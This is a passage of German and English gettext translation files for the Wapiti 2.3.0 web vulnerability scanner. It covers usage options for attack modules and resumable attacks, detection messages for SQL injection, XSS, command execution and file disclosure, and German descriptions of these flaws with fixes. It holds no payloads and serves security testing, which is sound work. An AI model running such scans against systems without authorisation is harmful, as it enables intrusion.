" \tUm das Ziel nur zu durchsuchen (ohne Payloads zu senden), deaktivieren Sie jedes Modul mit -m \"-all\".\n"
" \tOhne Festlegung von HTTP-Methoden werden GET und POST verwendet.\n"
" \tBeispiel: -m \"-all,xss:get,exec:post\"\n"
" \n"
" -u \n"
" --color \n"
" \tFarben benutzen, um Verwundbarkeiten und Anomalien in der Ausgabe zu markieren. \n"
" \n"
" -v \n"
" --verbose \n"
" \tProtokollierungstiefe festlegen. \n"
" \t0: Leise (Standard), 1: Jede URL ausgeben, 2: Jeden Angriff ausgeben. \n"
" \n"
" -b \n"
" --scope \n"
" \tSuchmuster festlegen:\n"
" \t\t+ page: um eine Seite zur analysieren, die als root-URL festgelegt wurde.\n"
" \t\t+ folder: um alle URLs unterhalb der root-URL, die an Wapiti übergeben wurde, zu analysieren.
(Standard).\n" " \t\t+ domain: um alle Links zu den Seiten zu analysieren, die innerhalb der gleichen Domain sind wie die URL, die an Wapiti übergeben wurde.\n" " \n" " -f \n" " --format \n" " \tFormat für den Bericht festlegen. \n" " \tjson: Report im JSON-Format \n" " \thtml: Report im HTML-Format (Standard)\n" " \topenvas: Report im OpenVAS XML-Format \n" " \ttxt: Report im Klartext (UTF-8) \n" " \tvulneranet: Report im VulneraNET-Format (XML basiert) \n" " \txml: Report im XML-Format \n" " \n" " -o \n" " --output \n" " \tDen Dateinamen des Berichts festlegen. \n" " \tWenn der Bericht im Format 'html' ist, wird dieser Parameter als Verzeichnisname benutzt.\n" " \n" " -i \n" " --continue \n" " \tDieser Parameter weist Wapiti an, den letzten Scan der in der XML-Statusdatei\n" " gespeichert wurde, fortzusetzen.\n" " \tDer Dateiname ist optional, falls nicht festgelegt, wird Wapiti die Standard- " "Datei aus dem \"scans\"-Verzeichnis nutzen.\n" " \n" " -k \n" " --attack \n" " \tDieser Parameter weist Wapiti an, die Angriffe fortzusetzen ohne die Website erneut " "zu scannen, indem es den Status aus der festgelegten Datei lädt.\n" " \tDer Dateiname ist optional, falls nicht festgelegt, wird Wapiti die Standard- " "Datei aus dem \"scans\"-Verzeichnis nutzen.\n" " \n" " --verify-ssl <0|1>\n" " \tDieser Parameter zeigt an, ob Wapiti SSL-Zertifikate überprüfen soll.\n" " \tStandardmäßig werden diese überprüft\n" " \n" " -h \n" " --help \n" " \tUm diese Dokumentation anzuzeigen\n" " " #: ../wapiti.py:418 msgid "Wapiti-2.3.0 (wapiti.sourceforge.net)" msgstr "Wapiti-2.3.0 (wapiti.sourceforge.net)" #: ../wapiti.py:549 msgid "File {0} loaded. Wapiti will use it to perform the attack" msgstr "Datei {0} geladen. 
Wapiti wird sie nutzen, um den nächsten Angriff durchzuführen" #: ../attack/attack.py:166 msgid "+ attackGET {0}" msgstr "+ attackGET {0}" #: ../attack/attack.py:171 ../attack/attack.py:185 #: ../attack/mod_permanentxss.py:87 ../attack/mod_permanentxss.py:89 #: ../attack/mod_permanentxss.py:147 ../attack/mod_permanentxss.py:272 msgid "error: {0} while attacking {1}" msgstr "Fehler: {0} während des Angriffs auf {1}" #: ../attack/attack.py:173 ../attack/attack.py:187 msgid "error: timeout while attacking {0}" msgstr "Fehler: Zeitüberschreitung während des Angriffs auf {0}" #: ../attack/attack.py:180 msgid "+ attackPOST {0} from {1}" msgstr "+ attackPOST {0} von {1}" #: ../attack/mod_backup.py:89 msgid "Found backup file !" msgstr "Sicherungsdatei gefunden !" #: ../attack/mod_backup.py:94 msgid "Backup file {0} found for {1}" msgstr "Sicherungsdatei {0} gefunden für {1}" #: ../attack/mod_blindsql.py:40 msgid "Blind SQL vulnerability" msgstr "Blinde SQL-Injektion" #: ../attack/mod_blindsql.py:93 ../attack/mod_file.py:146 #: ../attack/mod_sql.py:131 msgid "{0} via injection in the query string" msgstr "{0} durch Injektion in den Query-String" #: ../attack/mod_blindsql.py:141 ../attack/mod_blindsql.py:222 #: ../attack/mod_exec.py:195 ../attack/mod_exec.py:292 #: ../attack/mod_file.py:211 ../attack/mod_file.py:301 #: ../attack/mod_sql.py:258 msgid "{0} via injection in the parameter {1}" msgstr "{0} durch Injektion in den Parameter {1}" #: ../attack/mod_crlf.py:31 msgid "CRLF Injection" msgstr "CRLF-Injektion" #: ../attack/mod_crlf.py:70 ../attack/mod_crlf.py:77 msgid "(QUERY_STRING)" msgstr "(QUERY_STRING)" #: ../attack/mod_crlf.py:121 msgid "Error: The server did not understand this request" msgstr "Fehler: Der Server hat die Anfrage nicht verstanden" #: ../attack/mod_exec.py:45 msgid "Command execution" msgstr "Befehlsausführung" #: ../attack/mod_exec.py:48 msgid "PHP evaluation" msgstr "PHP-Interpretation" #: ../attack/mod_exec.py:51 ../attack/mod_exec.py:54 msgid 
"Warning exec" msgstr "Warnung exec" #: ../attack/mod_exec.py:57 ../attack/mod_exec.py:63 msgid "preg_replace injection" msgstr "preg_replace-Injektion" #: ../attack/mod_exec.py:60 msgid "Warning usort()" msgstr "usort()-Warnung" #: ../attack/mod_exec.py:66 msgid "Warning assert" msgstr "Assert-Warnung" #: ../attack/mod_exec.py:69 msgid "Evalutation warning" msgstr "Evaluations-Warnung" #: ../attack/mod_file.py:40 msgid "Remote inclusion vulnerability" msgstr "Entfernte Datei-Inklusions-Schwachstelle" #: ../attack/mod_file.py:41 msgid "Linux local file disclosure vulnerability" msgstr "Linux lokale Datei-Disclosure Schwachstelle" #: ../attack/mod_file.py:42 msgid "BSD local file disclosure vulnerability" msgstr "BSD lokale Datei-Disclosure Schwachstelle" #: ../attack/mod_file.py:43 msgid "Windows local file disclosure vulnerability" msgstr "Windows lokale Datei-Disclosure Schwachstelle" #: ../attack/mod_file.py:44 ../attack/mod_file.py:45 msgid "File disclosure vulnerability in include_path" msgstr "Datei-Disclosure Schwachstelle im include_path" #: ../attack/mod_file.py:46 msgid "highlight_file() vulnerability in basedir" msgstr "highlight_file() Schwachstelle im basedir" #: ../attack/mod_file.py:47 msgid "include() of file in include_path" msgstr "include() von Datei im include_path" #: ../attack/mod_file.py:84 msgid "Possible {0} vulnerability" msgstr "Mögliche {0} Schwachstelle" #: ../attack/mod_htaccess.py:75 msgid "HtAccess protection found: {0}" msgstr "HtAccess Schutz gefunden: {0}" #: ../attack/mod_htaccess.py:85 msgid "|HTTP Code: {0} : {1}" msgstr "|HTTP Code: {0} : {1}" #: ../attack/mod_htaccess.py:88 ../attack/mod_htaccess.py:102 msgid "Source code:" msgstr "Quellcode:" #: ../attack/mod_htaccess.py:94 msgid "{0} HtAccess" msgstr "{0} HtAccess" #: ../attack/mod_htaccess.py:95 msgid " .htaccess bypass vulnerability: {0}" msgstr " .htaccess bypass-Schwachstelle: {0}" #: ../attack/mod_htaccess.py:99 msgid "|HTTP Code: {0}" msgstr "|HTTP Code: {0}" #: 
../attack/mod_nikto.py:75 msgid "Problem with local nikto database." msgstr "Problem mit der lokalen nikto-Datenbank." #: ../attack/mod_nikto.py:76 msgid "Downloading from the web..." msgstr "Lade aus dem Web herunter..." #: ../attack/mod_nikto.py:90 msgid "Error downloading Nikto database" msgstr "Fehler beim Herunterladen der Nikto-Datenbank" #: ../attack/mod_nikto.py:235 ../attack/mod_nikto.py:237 msgid "References:" msgstr "Referenzen:" #: ../attack/mod_permanentxss.py:57 msgid "Stored XSS vulnerability" msgstr "Persistente XSS-Schwachstelle" #: ../attack/mod_permanentxss.py:115 ../attack/mod_permanentxss.py:161 msgid "Found permanent XSS in {0} with {1}" msgstr "Persistentes XSS gefunden in {0} mit {1}" #: ../attack/mod_permanentxss.py:213 ../attack/mod_permanentxss.py:280 msgid "Found permanent XSS attacked by {0} with fields {1}" msgstr "Persistentes XSS gefunden, angegriffen durch {0} mit den Feldern {1}" #: ../attack/mod_sql.py:39 ../attack/mod_sql.py:41 msgid "MySQL Injection" msgstr "MySQL Injektion" #: ../attack/mod_sql.py:43 msgid "Access-Based SQL Injection" msgstr "Access-basierte SQL-Injektion" #: ../attack/mod_sql.py:45 ../attack/mod_sql.py:47 ../attack/mod_sql.py:49 #: ../attack/mod_sql.py:70 msgid "MSSQL-Based Injection" msgstr "MSSQL-basierte Injektion" #: ../attack/mod_sql.py:52 msgid "Java.SQL Injection" msgstr "Java.SQL Injektion" #: ../attack/mod_sql.py:54 msgid "PostgreSQL Injection" msgstr "PostgreSQL Injektion" #: ../attack/mod_sql.py:56 ../attack/mod_sql.py:58 msgid "XPath Injection" msgstr "XPath Injektion" #: ../attack/mod_sql.py:60 msgid "LDAP Injection" msgstr "LDAP Injektion" #: ../attack/mod_sql.py:62 msgid "DB2 Injection" msgstr "DB2 Injektion" #: ../attack/mod_sql.py:64 msgid "Interbase Injection" msgstr "Interbase Injektion" #: ../attack/mod_sql.py:66 msgid "Sybase Injection" msgstr "Sybase Injektion" #: ../attack/mod_sql.py:68 msgid ".NET SQL Injection" msgstr ".NET SQL Injektion" #: ../attack/mod_sql.py:72 msgid "Acess-Based 
SQL Injection" msgstr "Acess-basierte SQL Injektion" #: ../attack/mod_sql.py:76 msgid "Oracle Injection" msgstr "Oracle Injektion" #: ../attack/mod_xss.py:59 msgid "XSS vulnerability" msgstr "XSS-Schwachstelle" #: ../attack/mod_xss.py:126 ../attack/mod_xss.py:337 msgid "XSS vulnerability found via injection in the resource path" msgstr "XSS-Schwachstelle gefunden durch Injektion in den Ressourcenpfad" #: ../attack/mod_xss.py:196 msgid "XSS vulnerability found via injection in the query string" msgstr "XSS-Schwachstelle gefunden durch Injektion in den Query-String" #: ../attack/mod_xss.py:270 ../attack/mod_xss.py:437 msgid "XSS vulnerability found via injection in the parameter {0}" msgstr "XSS -Schwachstelle gefunden durch Injektion in den Parameter {0}" #: ../net/getcookie.py:97 msgid "No forms found in this page !" msgstr "Keine Formulare auf der Seite gefunden !" #: ../net/getcookie.py:104 msgid "Choose the form you want to use :" msgstr "Wählen Sie ein Formular aus :" #: ../net/getcookie.py:113 msgid "Enter a number : " msgstr "Geben Sie eine Nummer ein : " #: ../net/getcookie.py:120 msgid "Please enter values for the following form: " msgstr "Bitte geben Sie Werte für das folgende Formular ein: " #: ../net/getcookie.py:121 msgid "url = {0}" msgstr "URL = {0}" #: ../net/cookie.py:75 msgid "Error getting url {0}" msgstr "Fehler beim Abruf der URL {0}" #: ../net/lswww.py:164 msgid "First argument must be the root url !" msgstr "Erster Parameter muss die root-URL sein !" #: ../net/lswww.py:169 msgid "Invalid protocol: {0}" msgstr "Ungültiges Protokoll: {0}" #: ../net/lswww.py:208 msgid "Invalid link argument: {0}" msgstr "Ungültiger Link-Parameter: {0}" #: ../net/lswww.py:266 msgid "Connection refused!" msgstr "Verbindung abgelehnt!" 
#: ../net/lswww.py:270 msgid "Exception in lswww.browse: {0}" msgstr "Ausnahme in lswww.browse: {0}" #: ../net/lswww.py:665 msgid "File {0} loaded, the scan continues:" msgstr "Datei {0} geladen, der Scan wird fortgesetzt:" #: ../net/lswww.py:667 msgid " * URLs to browse" msgstr " * URLs zu durchsuchen" #: ../net/lswww.py:670 msgid " * URLs browsed" msgstr " * URLs durchsucht" #: ../net/lswww.py:674 msgid "File {0} not found, Wapiti will scan again the web site" msgstr "Datei {0} nicht gefunden, Wapiti wird die Website noch einmal scannen" #: ../net/lswww.py:707 ../net/lswww.py:715 msgid " Notice" msgstr " Hinweis" #: ../net/lswww.py:709 msgid "This scan has been saved in the file {0}/{1}.xml" msgstr "Dieser Scan wurde in der Datei {0}/{1}.xml gespeichert" #: ../net/lswww.py:711 msgid "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" msgstr "Sie können es nutzen, um Angriffe ohne erneuten Scan der Website mit dem \"-k\" Parameter durchzuführen" #: ../net/lswww.py:717 msgid "Scan stopped, the data has been savedin the file {0}/{1}.xml" msgstr "Scan gestoppt, die Daten wurden in der Datei {0}/{1}.xml gespeichert" #: ../net/lswww.py:719 msgid "To continue this scan, you should launch Wapiti with the \"-i\" parameter" msgstr "Um diesen Scan fortzusetzen, sollten Sie Wapiti mit dem \"-i\" Parameter starten" #: ../net/lswww.py:729 msgid "URLs" msgstr "URLs" #: ../net/lswww.py:736 msgid "Forms Info" msgstr "Formular-Info" #: ../net/lswww.py:738 msgid "From: {0}" msgstr "Von: {0}" #: ../net/lswww.py:739 msgid "To: {0}" msgstr "An: {0}" #: ../net/lswww.py:747 msgid "Upload Scripts" msgstr "Upload-Skripte" #: ../net/lswww.py:1008 msgid "Forms" msgstr "Formulare" #: ../net/lswww.py:1011 msgid "Form {0}" msgstr "Formular {0}" #: ../net/lswww.py:1015 msgid " * Method: {0}" msgstr " * Methode: {0}" #: ../net/lswww.py:1016 msgid " * Intputs:" msgstr " * Eingabefelder:" #: ../net/lswww.py:1021 msgid " * Selects:" msgstr " * 
Auswahlfelder:" #: ../net/lswww.py:1026 msgid " * TextAreas:" msgstr " * Textbereiche:" #: ../net/lswww.py:1032 msgid "URLS" msgstr "URLS" #: ../report/txtreportgenerator.py:69 msgid "Report for {0}\n" msgstr "Bericht für {0}\n" #: ../report/txtreportgenerator.py:70 msgid "Date of the scan : {0}\n" msgstr "Datum des Scans : {0}\n" #: ../report/txtreportgenerator.py:72 msgid "Scope of the scan : {0}\n" msgstr "Suchmuster des Scans : {0}\n" #: ../report/txtreportgenerator.py:75 msgid "Summary of vulnerabilities :" msgstr "Zusammenfassung der Schwachstellen :" #: ../report/txtreportgenerator.py:78 msgid "{0} : {1:>3}\n" msgstr "{0} : {1:>3}\n" #: ../report/txtreportgenerator.py:88 ../report/txtreportgenerator.py:105 msgid "Evil request:\n" msgstr "Bösartige Anfrage:\n" #: ../report/txtreportgenerator.py:91 msgid "cURL command PoC : \"{0}\"" msgstr "cURL Befehl PoC : \"{0}\"" #: ../report/txtreportgenerator.py:97 msgid "Anomalies found:" msgstr "Anomalien gefunden:" #: ../wapiti.py:560 ../wapiti.py:559 msgid "Attack process interrupted. To perform again the attack, lauch Wapiti with \"-i\" or \"-k\" parameter." msgstr "Angriffsprozess wurde unterbrochen. Um den Angriff neu zu starten, führen Sie Wapiti mit den \"-i\" oder \"-k\" Parametern aus." #: ../wapiti.py:551 msgid "File {0} not found. Wapiti will scan the web site again" msgstr "Datei {0} nicht gefunden. Wapiti wird die Website erneut scannen" msgid "[!] Unable to find a module named {0}" msgstr "[!] Konnte kein Modul mit dem Namen {0} finden" msgid "Backup file description" msgstr "" "Es könnte möglich sein, Sicherungsdateien von Skripten auf dem Webserver zu " "finden, die der Webadmin dort abgelegt hat um eine ältere Version zu speichern " "oder es könnten automatisch erzeugte Sicherungsdateien der Editor-Software " "sein (zum Beispiel Emacs). 
Diese Kopien könnten interessante Informationen wie " "Quellcode oder Zugangsdaten enthalten" msgid "Backup file solution" msgstr "" "Der Webadmin muss die Sicherungsdateien manuell vom Server löschen oder sie " "aus dem Wurzelverzeichnis entfernen. Er sollte auch seinen Editor neu " "konfigurieren, um automatische Sicherungen zu deaktivieren." msgid "Blind SQL Injection description" msgstr "" "Blinde SQL-Injection ist eine Technik, die eine Schwachstelle ausnutzt, die " "in der Datenbank einer Anwendung auftritt. Diese Art von Schwachstelle ist " "schwerer zu erkennen als einfache SQL-Inkektionen weil keine Fehlermeldungen " "auf der Webseite ausgegeben werden." msgid "Blind SQL Injection solution" msgstr "" "Um sich gegen SQL-Injektion zu schützen, sollten Nutzereingaben nicht direkt " "in SQL-Abfragen eingebettet werden. Stattdessen sollten Nutzereingaben " "'escaped' oder gefiltert werden oder es sollten parametrisierte Abfragen " "verwendet werden." msgid "Commands execution description" msgstr "" "Dieser Angriff besteht darin, auf dem Server Befehle auszuführen. Der " "Angreifer versucht, diese Befehle in die Anfrageparameter zu injizieren" msgid "Commands execution solution" msgstr "Bei Dateisystemaufrufen vorzugsweise ohne Nutzereingaben arbeiten" msgid "CRLF description" msgstr "" "Der Begriff CRLF verweist auf den 'Carriage Return' (ASCII 13, \\r) 'Line " "Feed' (ASCII 10, \\n). Es wird genutzt um das Zeilende festzulegen, " "allerdings wird damit in heutigen häufig genutzten Betriebssystemen " "unterschiedlich umgegangen. Zum Beispiel: In Windows werden sowohl CR als " "auch LF benötigt, um ein Zeilenende festzulegen, wohingegen unter Linux/ " "UNIX nur ein LF benötigt wird. Diese Kombination aus CR und LF wird zum " "Beispiel benutzt wenn man 'Enter' auf der Tastatur drückt. Abhängig von " "der genutzten Anwendung weist 'Enter' diese an, eine neue Zeile zu " "beginnen oder um einen Befehl zu senden." 
msgid "CRLF solution" msgstr "" "Prüfen Sie die angegebenen Parameter verhindern Sie die Injektion von CRLF, " "indem Sie es filtern" msgid "Cross Site Scripting description" msgstr "" "Cross-Site-Scripting (XSS) ist eine Art von Schwachstelle, die häufig in " "Webanwendungen gefunden wird, die es erlauben, dass Code von bösartigen " "Nutzern in Webseiten, die von anderen Nutzern eingesehen werden können, " "injiziert wird. Beispiele solcher Codes sind HTML-Codes und clientseitige " "Skripte." msgid "Cross Site Scripting solution" msgstr "" "Die Beste Art, eine Webanwendung vor XSS-Attacken zu schützen ist sicherzustellen, " "dass die Anwendung eine Validierung aller Header, Cookies, Query-Strings, " "Formularfelder und versteckter Felder durchführt. Das Kodieren von Nutzereingaben " "auf dem Server kann auch XSS-Schwachstellen besiegen, indem man verhindert, " "dass in Formularen ausführbare Skripte eingefügt werden können. Anwendungen " "können einen signifikanten Schutz vor JavaScript-basierten Angriffen erlangen, " "indem sie die folgenden Zeichen in der gesamten Ausgabe durch die entsprechenden " "HTML-Entities umwandeln: <, >, &, \", ', (, ), #, %, ; , +, -." msgid "File Handling description" msgstr "" "Dieser Angriff ist auch bekannt als 'Path Traversal' oder 'Directory Traversal', " "sein Ziel ist es, den Zugriff zu Dateien und Verzeichnissen, die außerhalb des " "Webroots liegen, zu erlangen. Der Angreifer versucht, die Verzeichnisse auf dem " "Webserver zu erkunden. Der Angreifer benutzt dabei einige Techniken, zum Beispiel " "die Manipulation der Variablen die auf Dateien verweisen mit Sequenzen von " "'Punkt-Punkt-Slash (../)' und deren Variationen, um zum Wurzelverzeichnis zu " "wechseln und so durch das Dateisystem zu navigieren." msgid "File Handling solution" msgstr "" "Ziehen Sie es vor, ohne Nutzereingaben zu arbeiten, wenn Sie Systemaufrufe " "verwenden. 
Nutzen Sie besser tatsächliche Dateinamen in Templates oder " "Sprachdateien (z.B.: Der Wert 5 aus der Nutzereingabe = Tschechisch, anstatt " "zu erwarten, dass der Nutzer 'Tschechisch' übergibt). Stellen Sie sicher, " "dass Nutzer nicht alle Teile eines Dateipfades übergeben können - stellen Sie " "Ihren Pfad selbst voran. Validieren Sie Nutzereingaben, indem Sie nur gute " "Eingaben akzeptieren - verbessern Sie die Eingaben nicht. Nutzen Sie durch " "chroot geschützte Bereiche und Codezugangsrichtlinien, um einzuschränken, " "wo Dateien gelesen oder gespeichert werden können." msgid "Htaccess bypass description" msgstr "" "htaccess-Dateien werden genutzt um Zugriffe auf einige Dateien über HTTP " "einzuschränken. In einigen Fällen kann es möglich sein, diese Einschränkungen " "zu umgehen und auf diese Dateien zuzugreifen." msgid "Htaccess bypass solution" msgstr "Stellen Sie sicher, dass bei falschen Zugangsdaten jede HTTP-Methode verboten ist." msgid "Internal server error description" msgstr "Ein Fehler der es verhindert die Anfrage zu verarbeiten ist auf der Serverseite aufgetreten. Es könnte das Anzeichen einer Schwachstelle sein" msgid "Internal server error solution" msgstr "Weitere Informationen über den Fehler sollten Sie in den Serverlogs finden." msgid "Potentially dangerous file description" msgstr "Eine Datei mit möglichen Schwachstellen wurde auf der Website gefunden" msgid "Potentially dangerous file solution" msgstr "Stellen Sie sicher, dass das Skript auf dem neuesten Stand ist und schränken Sie den Zugriff darauf ein" msgid "Resource consumption description" msgstr "Der Server brauchte eine ungewöhnlich lange Zeit, um die Anfrage zu verarbeiten. Ein Angreifer könnte diese Schwachstelle nutzen um den Server zu überladen" msgid "Resource consumption solution" msgstr "Das betreffende Skript könnte Serverressourcen (CPU, Arbeitsspeicher, Netzwerk, Dateizugriff...) 
auf ineffiziente Weise nutzen" msgid "SQL Injection description" msgstr "" "SQL-Injektions-Schwachstellen erlauben einem Angreifer, die Abfragen die in der Datenbank ausgeführt werden, zu verändern. " "Ein Angreifer könnte dann in der Lage sein, Informationen die in der Datenbank gespeichert sind auszulesen, zu verändern oder sogar " "seine Priviligien auf dem System zu erhöhen." msgid "SQL Injection solution" msgstr "" "Um sich gegen SQL-Injektion zu schützen, sollten Nutzereingaben nicht direkt " "in SQL-Abfragen eingebettet werden. Stattdessen sollten Nutzereingaben " "'escaped' oder gefiltert werden oder es sollten parametrisierte Abfragen " "genutzt werden."
wapiti-2.3.0+dfsg/wapitiCore/language_sources/en.po
# Copyright (C) YEAR 2009-2013 Nicolas SURRIBAS # This file is distributed under the same license as the Wapiti package. # #, fuzzy msgid "" msgstr "" "Project-Id-Version: Wapiti SVN\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2013-08-25 17:33+0200\n" "PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n" "Last-Translator: FULL NAME \n" "Language-Team: LANGUAGE \n" "Language: \n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" #: ../vulnerability.py:23 msgid " Evil url: {0}" msgstr " Evil url: {0}" #: ../vulnerability.py:24 msgid "{0} in {1} via injection in the parameter {2}" msgstr "{0} in {1} via injection in the parameter {2}" #: ../vulnerability.py:25 msgid " coming from {0}" msgstr " coming from {0}" #: ../vulnerability.py:26 msgid "{0} in {1} via injection in the query string" msgstr "{0} in {1} via injection in the query string" #: ../vulnerability.py:27 msgid "{0} in {1} via injection in the resource path" msgstr "{0} in {1} via injection in the resource path" #: ../vulnerability.py:28 msgid "Involved parameter: {0}" msgstr "Involved parameter: {0}" #: ../vulnerability.py:29 msgid "Evil request:" msgstr "Evil request:" 
#: ../vulnerability.py:67 msgid "SQL Injection" msgstr "SQL Injection" #: ../vulnerability.py:68 msgid "Blind SQL Injection" msgstr "Blind SQL Injection" #: ../vulnerability.py:69 msgid "File Handling" msgstr "File Handling" #: ../vulnerability.py:70 msgid "Cross Site Scripting" msgstr "Cross Site Scripting" #: ../vulnerability.py:72 msgid "Commands execution" msgstr "Commands execution" #: ../vulnerability.py:73 msgid "Htaccess Bypass" msgstr "Htaccess Bypass" #: ../vulnerability.py:74 msgid "Backup file" msgstr "Backup file" #: ../vulnerability.py:75 msgid "Potentially dangerous file" msgstr "Potentially dangerous file" #: ../vulnerability.py:80 msgid "Internal Server Error" msgstr "Internal Server Error" #: ../vulnerability.py:81 msgid "Resource consumption" msgstr "Resource consumption" #: ../vulnerability.py:83 msgid "Received a HTTP 500 error in {0}" msgstr "Received a HTTP 500 error in {0}" #: ../vulnerability.py:84 msgid "Timeout occured in {0}" msgstr "Timeout occured in {0}" #: ../vulnerability.py:86 msgid "The request timed out while attempting to inject a payload in the query string" msgstr "The request timed out while attempting to inject a payload in the query string" #: ../vulnerability.py:87 msgid "The request timed out while attempting to inject a payload in the resource path" msgstr "The request timed out while attempting to inject a payload in the resource path" #: ../vulnerability.py:88 msgid "The request timed out while attempting to inject a payload in the parameter {0}" msgstr "The request timed out while attempting to inject a payload in the parameter {0}" #: ../vulnerability.py:90 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string" msgstr "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string" #: ../vulnerability.py:92 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path" 
msgstr "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path" #: ../vulnerability.py:94 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}" msgstr "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}" #: ../wapiti.py:69 msgid "Invalid argument for option {0} : {1}" msgstr "Invalid argument for option {0} : {1}" #: ../wapiti.py:226 msgid "[*] Loading modules:" msgstr "[*] Loading modules:" #: ../wapiti.py:297 msgid "No links or forms found in this page !" msgstr "No links or forms found in this page !" #: ../wapiti.py:298 msgid "Make sure the url is correct." msgstr "Make sure the url is correct." #: ../wapiti.py:310 msgid "[!] Missing dependecies for module {0}:" msgstr "[!] Missing dependecies for module {0}:" #: ../wapiti.py:316 msgid "[+] Launching module {0}" msgstr "[+] Launching module {0}" #: ../wapiti.py:321 msgid "Upload scripts found:" msgstr "Upload scripts found:" #: ../wapiti.py:335 msgid "Report" msgstr "Report" #: ../wapiti.py:337 msgid "A report has been generated in the file {0}" msgstr "A report has been generated in the file {0}" #: ../wapiti.py:339 msgid "Open {0}/index.html with a browser to see this report." msgstr "Open {0}/index.html with a browser to see this report." #: ../wapiti.py:410 msgid "wapitiDoc" msgstr "" "Wapiti-2.3.0 - Web application vulnerability scanner \n" " \n" " Usage: python wapiti.py http://server.com/base/url/ [options] \n" " \n" " Supported options are: \n" " -s \n" " --start \n" " \tTo specify an url to start with. This option can be called several times.\n" " \tWapiti will browse these links to find more URLs even if the specified link is not in the scope.\n" " \n" " -x \n" " --exclude \n" " \tTo exclude an URL from the scan (eg: logout URLs). 
This option can be called several times to specify several URLs.\n" " \tWildcards (*) can be used in URLs for basic regex.\n" " \tExample : -x http://server/base/?page=*&module=test\n" " \tor -x http://server/base/admin/* to exclude a directory.\n" " \n" " -p \n" " --proxy \n" " \tTo specify a proxy. Currently supported proxies are HTTP and HTTPS.\n" " \tThis option can be called twice to specify the HTTP and the HTTPS proxy.\n" " \tExample: -p http://proxy:port/\n" " \n" " -c \n" " --cookie \n" " \tTo import cookies to use for the scan. The cookie file must be in JSON format.\n" " \tCookies can be grabbed using the cookie.py and getcookie.py utilities (net directory).\n" " \n" " -t \n" " --timeout \n" " \tTo set the timeout (maximum time in seconds to wait for the server to send a response).\n" " \n" " -a \n" " --auth \n" " \tSet credentials for HTTP authentication.\n" " \n" " --auth-method \n" " \tIf the server requires an authentication, set the authentication method to use.\n" " \tCurrently supported methods are (some requires additional modules to install):\n" " \t\t+ basic\n" " \t\t+ digest\n" " \t\t+ kerberos\n" " \t\t+ ntlm\n" " \n" " -r \n" " --remove \n" " \tRemove a parameter (name and value) from URLs.\n" " \n" " -n \n" " --nice \n" " \tDefine a limit of URLs to browse with the same pattern (ie, the maximum number of unique values for the same parameter).\n" " \tUse this option to prevent endless loops during scan. Limit must be greater than 0.\n" " \n" " -m \n" " --module \n" " \tSet the modules (and HTTP methods for each module) to use for attacks.\n" " \tPrefix a module name with a dash to deactivate the related module.\n" " \tTo only browse the target (without sending any payloads), deactivate every module with -m \"-all\".\n" " \tIf you don't specify the HTTP methods, GET and POST will be used.\n" " \tExample: -m \"-all,xss:get,exec:post\"\n" " \n" " -u \n" " --color \n" " \tUse colors to highlight vulnerabilities and anomalies in output. 
\n" " \n" " -v \n" " --verbose \n" " \tSet the verbosity level. \n" " \t0: quiet (default), 1: print each URL, 2: print every attack. \n" " \n" " -b \n" " --scope \n" " \tSet the scope of the scan:\n" " \t\t+ page: to analyse only the page given as the root URL.\n" " \t\t+ folder: to analyse all the URLs under the root URL passed to Wapiti (default).\n" " \t\t+ domain: to analyse all the links to the pages which are in the same domain as the URL passed to Wapiti.\n" " \n" " -f \n" " --format \n" " \tSet the format type for the report. \n" " \tjson: Report in JSON format \n" " \thtml: Report in HTML format (default)\n" " \topenvas: Report in OpenVAS XML format \n" " \ttxt: Report in plain text (UTF-8) \n" " \tvulneranet: Report in VulneraNET (XML based) format \n" " \txml: Report in XML format \n" " \n" " -o \n" " --output \n" " \tSet the name of the report file. \n" " \tIf the selected report format is 'html', this parameter will be used as a directory name.\n" " \n" " -i \n" " --continue \n" " \tThis parameter indicates to Wapiti to resume the previous scan saved in the\n" "specified XML status file.\n" " \tThe file name is optional, if not specified, Wapiti takes the default " "file from the \"scans\" folder.\n" " \n" " -k \n" " --attack \n" " \tThis parameter indicates to Wapiti to resume the attacks without scanning the " "website again, loading the scan status from the specified file.\n" " \tThe file name is optional, if it is not specified, Wapiti takes the default " "file from the \"scans\" folder.\n" " \n" " --verify-ssl <0|1>\n" " \tThis parameter indicates whether Wapiti must check SSL certificates.\n" " \tDefault is to verify certificates\n" " \n" " -h \n" " --help \n" " \tTo print this usage message\n" " " #: ../wapiti.py:418 msgid "Wapiti-2.3.0 (wapiti.sourceforge.net)" msgstr "Wapiti-2.3.0 (wapiti.sourceforge.net)" #: ../wapiti.py:549 msgid "File {0} loaded. Wapiti will use it to perform the attack" msgstr "File {0} loaded. 
Wapiti will use it to perform the attack" #: ../attack/attack.py:166 msgid "+ attackGET {0}" msgstr "+ attackGET {0}" #: ../attack/attack.py:171 ../attack/attack.py:185 #: ../attack/mod_permanentxss.py:87 ../attack/mod_permanentxss.py:89 #: ../attack/mod_permanentxss.py:147 ../attack/mod_permanentxss.py:272 msgid "error: {0} while attacking {1}" msgstr "error: {0} while attacking {1}" #: ../attack/attack.py:173 ../attack/attack.py:187 msgid "error: timeout while attacking {0}" msgstr "error: timeout while attacking {0}" #: ../attack/attack.py:180 msgid "+ attackPOST {0} from {1}" msgstr "+ attackPOST {0} from {1}" #: ../attack/mod_backup.py:89 msgid "Found backup file !" msgstr "Found backup file !" #: ../attack/mod_backup.py:94 msgid "Backup file {0} found for {1}" msgstr "Backup file {0} found for {1}" #: ../attack/mod_blindsql.py:40 msgid "Blind SQL vulnerability" msgstr "Blind SQL vulnerability" #: ../attack/mod_blindsql.py:93 ../attack/mod_file.py:146 #: ../attack/mod_sql.py:131 msgid "{0} via injection in the query string" msgstr "{0} via injection in the query string" #: ../attack/mod_blindsql.py:141 ../attack/mod_blindsql.py:222 #: ../attack/mod_exec.py:195 ../attack/mod_exec.py:292 #: ../attack/mod_file.py:211 ../attack/mod_file.py:301 #: ../attack/mod_sql.py:258 msgid "{0} via injection in the parameter {1}" msgstr "{0} via injection in the parameter {1}" #: 